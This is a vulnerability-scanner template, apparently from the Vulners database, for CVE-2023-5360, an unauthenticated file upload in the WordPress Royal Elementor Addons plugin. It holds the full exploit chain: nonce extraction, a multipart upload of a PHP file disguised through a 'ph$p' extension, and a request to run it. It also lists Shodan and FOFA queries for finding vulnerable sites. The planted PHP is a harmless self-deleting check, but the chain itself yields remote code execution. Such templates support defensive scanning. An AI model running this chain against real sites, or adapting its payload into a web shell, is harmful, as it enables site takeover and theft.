id: CVE-2023-5360
info:
name: WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79
impact: |
Unauthenticated attackers can upload arbitrary files including PHP backdoors to gain complete control of the WordPress site.
remediation: Fixed in 1.3.79
reference:
- https://wordpress.org/plugins/royal-elementor-addons/
- https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/
- https://nvd.nist.gov/vuln/detail/CVE-2023-5360
- https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34
- http://packetstormsecurity.com/files/175992/WordPress-Royal-Elementor-Addons-And-Templates-Remote-Shell-Upload.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-5360
cwe-id: CWE-434
epss-score: 0.81695
epss-percentile: 0.99599
cpe: cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*
metadata:
verified: "true"
max-request: 3
vendor: royal-elementor-addons
product: royal_elementor_addons
framework: wordpress
shodan-query: http.html:/plugins/royal-elementor-addons/
fofa-query: body=/plugins/royal-elementor-addons/
publicwww-query: "/plugins/royal-elementor-addons/"
tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive,vkev,vuln
variables:
file: "{{to_lower(rand_text_alpha(5))}}"
string: "CVE-2023-5360"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------318949277012917151102295043236
-----------------------------318949277012917151102295043236
Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p"
Content-Type: image/png
<?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------318949277012917151102295043236
Content-Disposition: form-data; name="allowed_file_types"
ph$p
-----------------------------318949277012917151102295043236
Content-Disposition: form-data; name="triggering_event"
click
-----------------------------318949277012917151102295043236
Content-Disposition: form-data; name="wpr_addons_nonce"
{{nonce}}
-----------------------------318949277012917151102295043236--
- |
GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- '{{md5(string)}}'
extractors:
- type: regex
name: nonce
part: body_1
group: 1
regex:
- 'WprConfig\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"'
internal: true
- type: regex
name: filename
part: body_2
group: 1
regex:
- 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php'
internal: true
# digest: 4a0a0047304502206ad3349cfdcb6d59cb2bfc756096dfb5af8cf687ca7c2a327c3fdb110324ce55022100a822171b4acf67056b26e7357b93bd47a0aef2e3d35f76584bf73189bebef043:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation